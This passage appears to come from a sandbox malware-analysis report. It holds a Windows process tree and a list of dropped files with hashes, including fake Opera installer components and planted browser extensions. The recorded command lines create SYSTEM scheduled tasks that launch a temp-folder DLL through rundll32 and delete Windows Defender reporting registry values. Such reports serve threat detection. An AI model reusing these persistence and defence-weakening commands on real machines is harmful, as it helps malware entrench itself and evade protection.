                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /CREATE /TN "gcsaRhxvmhmmEZS2" /F /xml "C:\Program Files (x86)\IAvstfEYU\NBWSAaH.xml" /RU "SYSTEM"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:2448
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /END /TN "gcsaRhxvmhmmEZS"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4264
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /DELETE /F /TN "gcsaRhxvmhmmEZS"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4864
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "GQBvHPrMcnsQR2" /F /xml "C:\ProgramData\cvDkMpEVJyabfeVB\RyoANsR.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:548
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "IsxNCaiPdRDTBP" /F /xml "C:\Program Files (x86)\gNEkwGGiCnIU2\BThYRuO.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4952
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "FDSsfUJUNzWcTDuAR2" /F /xml "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\IqHUwPy.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:2004
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "mTrzZzYaKbZcxyPVaUZ2" /F /xml "C:\Program Files (x86)\WNdNVmbTRKpEC\LOkkeeb.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:1164
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "drPQSDndGmRZEFerX" /SC once /ST 07:47:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll\",#1 /QFsite_idtbI 385118" /V1 /F
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:3484
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "drPQSDndGmRZEFerX"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3308
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2684
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:4404
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2168
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4964
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /DELETE /F /TN "HddpujWaDpLIbkLdt"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:924
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2004
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3456
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1680
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2624
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll",#1 /QFsite_idtbI 385118
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        PID:3204
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll",#1 /QFsite_idtbI 385118
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                          PID:1956
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "drPQSDndGmRZEFerX"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2788

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ad6c19bb535e3e59e893a58179e22797

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          315a3cf56db6f073f89a22fe79461a94de96ef77

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9111872866006835589336c207a312618387ee457b2d1906bd452e0a4542291

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          d54e86125374b16390bbba57c360436e70f5b5b59e33c789c47dd5109da57bdd59449839f6d2be1455fa2c3d9c5d8f1688f093196be06d8faf3794c27dd87708

                                                                                                                                                                                                        • C:\ProgramData\Are.docx

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          11KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          177KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          79bff1c1e0d131418a493ae38056918c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3ffe6c78c3f7805ddcd65988ebfc8f4841b6ff05

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5c0ed5a4711f08c33f5c4d15acc5fba84a8457a8adcc2100da7a9d27f65c4bae

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bd90dee8e5c3d863d40e3ad7992c211acb08f878b46d75032d8c907f08de66e689e4f6805159b5557bb250a3ca5474289ba2e84ccf02fa5f0d5e4b5b46e7110e

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          275KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          f8f201543c1548ad1db0240618a82cfb

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          2104531a9e824d2d13dc35d6d0fe899d9b344c17

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d14ecf0d628952ebe137631021e541ec83bc4ffec4537abdb524707f940058b5

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1e8a28246e6a13393ea3b346364cce2fda8960dc0a2707170d46430159bc5d71a183550d84354dad7456380683667585fc9fb4ade08e5bcd6b7a316f936e59d2

                                                                                                                                                                                                        • C:\ProgramData\nss3.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          195KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          f38331e0c62df4df9270fd646324c512

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          41efba8de3db44e6db464fd4acd8848774413325

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          eda214d405625f144fba0722edbf84d26501780a852fedca309d2359c188a9fd

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          706b6d4f4ef9020262a845e43bafef355bbef44da97e38f14975d49139c330e04b131e2d1a07c9958fb5f36ba2510713df50a485f80863578bbc2af82d709491

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          187B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          136B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          150B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          10KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ad5928c418205f33e6394f24e5f12d76

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          4c82569b1e0cf49da0acf29efe9abb4e023d7afc

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fbff3e020cb0df5f2a981d0445e95a80c51da1c5b6f6e6a460d53009c7230ceb

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2339ad6841fc43ed7bf44e74c83f4df7bbcc653470d6e530c591bdf09c6833dde8741890defdcf34e4799af19490bc501bc015c0c8c7cdb1efa465ef4a060189

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          151B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          9KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c62014cf5dd988191bf2582412cd8a60

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8db64ca6ed2ffc5c7461834faa693f8fd0aed2b7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          57a7fa9b66d8cf7fd9f4fa744f8430706611df5f61cd5b8a368bf700c6beb7c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e7eb6d7e94d34bbc33eb3124ea44c035fd4cab0737ea6010197f4233672e67f0271392d150b85e2e84db78e3415754e7bfa637d718ea0ac91895597e0deec869

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          21KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bce8844b1bd0514e5b7b8d4f3e522dd9

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          806524c5a8f5e1efa0533c8bd31e180aecc1a83f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ffb42f21464d299e5349ede9b200799e56b4c5d6c20daffef33d8f82077fc737

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          99b916fae3a777f499942350279228882858869355f0068a9aaabc1d44b2d494260cbfe2a375bcc2970dd500b0a90e4a22e613a909cbc42ea254e71bf2f7f146

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          18KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0cb4ce73dc6f5623f69bf0ec15676287

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b0ba699879f9689817c99391a7123059a8b268df

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a236c830d376c874cd5bb0f5e118c784cac2154561f8aee9dff0dcb49590f052

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e9923c056e45bb035c291cc7e1c4f8fd4968d3615fcabb5067e94e9a45e5fc71b93d669ad87135a4a34a92dd4fa01d520cf13ea7302a0a0d4fd4fd0a550a491e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\aH61TFChdeJtMgESTog4SHo0.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          219KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c6bafbf0020f6477685237cad72732b0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          be928641942333e934d621fd6fc2c3a6d95d7193

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7996847dbd47e02298de85cde4cdbe55614be8c9a5d6fe5d0b1b621b3dd20f90

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          ff76ac9a6ac35c0f9311d0fed316077664f5ff1ec7fa2b11afebd4ff7f517d6fb7b7af24e2ed8c137a09c8bf2465e26ace3e768395f02a61644af91817c95340

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\additional_file0.tmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          107KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          690d947dcbbb9a99c308472c4bd1ce9f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d4349d5e3341796febbbea2ddb8f9ac2ca3f4b75

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ef4dbbae0c3ab8f28809ce1c9ff2434f06ae0a2a974e0ce95db7675a59d18b05

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f3b4b7fc74f9c80ef8b8ad426a56f04ddd37b5b32cf52b8ed62e36ae4fd48ce02e35cf5016d75a50f4bc1f034a5b401378bd6cf4ff66c74339bd0c69f31839ea

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          104KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          730d227ce17ed4e7bb5b83ab61f489cd

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          bf422fd759cf6b962802327b5ec0003b241a9e0c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          28f04b34705b95fc4e971395687d0caea9d439187cfd666bb0fe04e2d9fb4670

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          ff9e0f9a62718edda725f988b7440e5bef60801bc5a095d7ead4c345978992044117625185e55ab2371344fd7dda896dce774a3f59752348a2a833369433eee8

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          144KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          888c420b3de0d326520c9e065a1a650c

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3bdfa50139ea34b28578b422b76eaafd7513d7fa

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a3ff45f614cc293d42bdf138c1938b9732515c04ca8a6e95184872f189978c7f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          dfaabc69031aa3d80f357907a112e0d9a8f72a173f32545b5f02ca979186d414f5c75c0563874e9d7b1022c6babccb600affac785cd26e08c5caac6708852cca

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          318KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d872f22c5e6829e8012669b9a50910eb

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          424945153325c014ac899c1f660e443dcefbd204

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          5e9ce9e688d4bb4c6e724576300412da3bb88820f798d08cb92c10cb38c8bbd6

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bde9792e041a9d3d939fb56dea306f9dfd10ccb9c0294f34e7036d4347008348fc1a0f2c7c4163a7a043de29777ddb840a6144b607f454f95cbdac4e2c8dfdf5

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          53KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          72eb388884c7e6e3538fa5737af70aa5

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          ba495fae8b9b6186026716f30e9a17a39cd27226

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7575c08655e8d8b99cb0ab552928dc3438aecfea9c1c185467bbc80fee2d5562

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          6e4dba135b01eefafd38a50b556f2cc59ce62c9565b49c571f6e578806c0d0f950694ae55d5551dc4097dbb67af93a7c26b297a7e62057fa839dff6885d424a7

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbgcore.DLL

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a59b6c6d04bac536cc7fafe92f0d1bda

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6d5bbdfafbe2ea65e3aa9abc088e0fc6e20be8a1

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          c2d92d6e9a3ea40f38d275499bef7ba899802f131160ce1a2f76314b87b531ac

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          49e748676c54482f7de089fb6eaa45b5cb3e59a1b9125d90619371678749a0b80cf8ef8c7cf75c8486d20b89639a8b679c23a671a2c3b6dff1f86ea9cb1a7f5c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          92KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5bb5aceed179c41c7c26da26c45d449b

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7f98b8f1e428a06e712ee49cb4e76c2afc62296a

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fea8f29c881af240553a88586702db3b1622545561bfda242740f6a596e214c4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          889a0f1b6f1d6d03b0f47fb4c74e74ac00b5f1d4516e3f31eff43ca4ddbb7e4853958deed5e62bd90ccfe61eb8379ca603cf968cf0945605592e64428d67c8b5

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          62KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          519b8022455ce3d0d3f2f5a4bf309efc

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f53a578153c49533847b09f1ee82cb90b168d45e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          22007af00051de37a32aa09513bb97a1ec84004be211ece100552723e24eaf98

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          cd43fea6d0f04543f1eaae1409ea853baa2364c9bf649bd3a196fad7bb80b43ef02e54093d2c355fa3e95907f8f2dbcb3dbf5afc2ab073914706dd5843842f2b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          5KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ff652f9251ed53e0ff43eb46db005a47

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          85a47c45965c1e670bd6f2c255c788c3d18ec9b9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          299ab04c2c4f5738cdfb05b3ae46dcc43a02c72f1f57040530da9e4739ae75f2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          6cc75d073dee1f4f71e2700f1583ca0aef17e946ba0b48424fbcedf9d6c86c0e960ea0bb0a5a257a394b28b2302d77f88c7df1eb0c7199eaf647a041eb7b6b19

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          319KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0aabf18686a36f9c0d167cc58e394120

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          2154c9ac039252f834a21b719e26d3033b0d07ee

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          90bc1453f252d292b5fb02a0bce217e155bdb1693ae11bca9c1bfd70c2506b61

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0119ddfff2a5a84213b26348cb2dcee8e674116b57c189a310e66b5f31b000e034a079a4b7ddd30ef5447c619129e9545669b3a79e9d45c2a962b9c71ddec1dc

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          107KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          cef792ed48ee3469d23768c019682f43

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          38f8c6b521c4304ebd0f67a84eca343f1a6d2b31

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0d95f9e55ea59adc26767d09aa965883f40bff42858339b70e63ebd551a8920b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          2a43b1e77afd72da0ac9f300f46585f6cc936a53399c6febd0215bcd2aa5fc64033f8f145ce7618a810416446cf2101a29a14b82acc95719a42f834cff0c9fef

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\opera_package

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          148KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ccb3df912d388131cecac5fb3c6f730d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8d875e84955774630fbade2a79f57b14a4decf4c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          2aaf134776befa8d537dff3b25cd7e67ba48d8ceed0d7cac6047e83e6d466e3a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          8894dbfeab8108d94b2955440a9bf87b376115154e6605a00b53c4b20ac942f4a7c9ec644f5fa9b0094287c0388f77dfa49e378ffbfd5aad81c347518d979d9f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8FD.tmp\Install.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          498KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          608009421131a3ba53c2fabb38fa7caf

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c50ab96cf9856f1cdf1993c4b33e317cbe9448c9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ccf6de7aad19b1651b0bfa1eebdb9771984acefae522015e5fec05fbf56059c4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b1ea87031003bc7408dc0c561945bf302b9fae819964ed7dfb96b580ca4f4628a540af238c583b0d16251eda5b07727aeb1268682e16d2553364061af3cc555e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8FD.tmp\Install.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          368KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bfc6093df61107c263ff3b06b4fc2ea6

                                                                                                                                                                                                          SHA1

